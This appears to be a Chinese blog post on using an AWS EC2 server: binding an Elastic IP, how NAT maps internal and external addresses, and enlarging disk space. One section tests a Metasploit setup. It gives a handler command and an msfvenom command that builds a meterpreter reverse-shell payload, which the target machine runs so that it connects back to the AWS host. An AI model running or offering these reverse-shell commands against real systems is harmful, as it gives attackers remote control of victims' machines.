AWS亚马逊云服务器使用(二)

上一篇:AWS亚马逊云服务器搭建与使用

绑定弹性IP

参考资料:https://docs.aws.amazon.com/zh_cn/AWSEC2/latest/UserGuide/elastic-ip-addresses-eip.html

弹性IP是aws的一个特性,它可以分配给A实例,当你不想要A实例的时候,又可以分配给B实例。于是IP是不变的,但是IP对应的机器却变了。这样比较方便,使用者完全感受不到底层的变化。

当我们把弹性IP实例关联以后,就不用担心IP会变化了。如果不使用弹性IP,实例重启后,分配的IP可能会改变。

ifconfig,只有两个网卡,一个内网地址、一个本地环回地址。没有外网IP。

亚马逊云服务器外网IP与内网IP之间是通过一对一的NAT实现的,内网Ip配置在网卡上,外网Ip配置在网关上。如有需要绑定IP的场景,直接绑定内网IP即可,可以转发到外网IP上

第一步:

msf绑定外网ip失败

当在aws上部署msf的时候,监听外网IP,却提示Handler failed to bind to 本地外网IP

于是测试一下,msf监听,反弹shell是否能反弹成功。

aws监听:

1
handler -H aws外网IP -P 6678 -p linux/x86/meterpreter/reverse_tcp

目标机器:执行payload.elf

1
2
3
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=aws外网IP LPORT=6678 -f elf -o payload.elf

./payload.elf

aws确实是可以反弹成功的。

所以handler绑定失败是正常的,提示在0.0.0.0监听,意思是监听所有网卡的该端口。

扩大硬盘空间

aws EC2默认只有8GB,当要存储需要用的软件时,空间不够,可以选择扩大卷。

https://amazonaws-china.com/cn/blogs/china/amazon-ebs-elastic-volumes/

https://kionf.com/2017/11/15/linux-aws-ebs/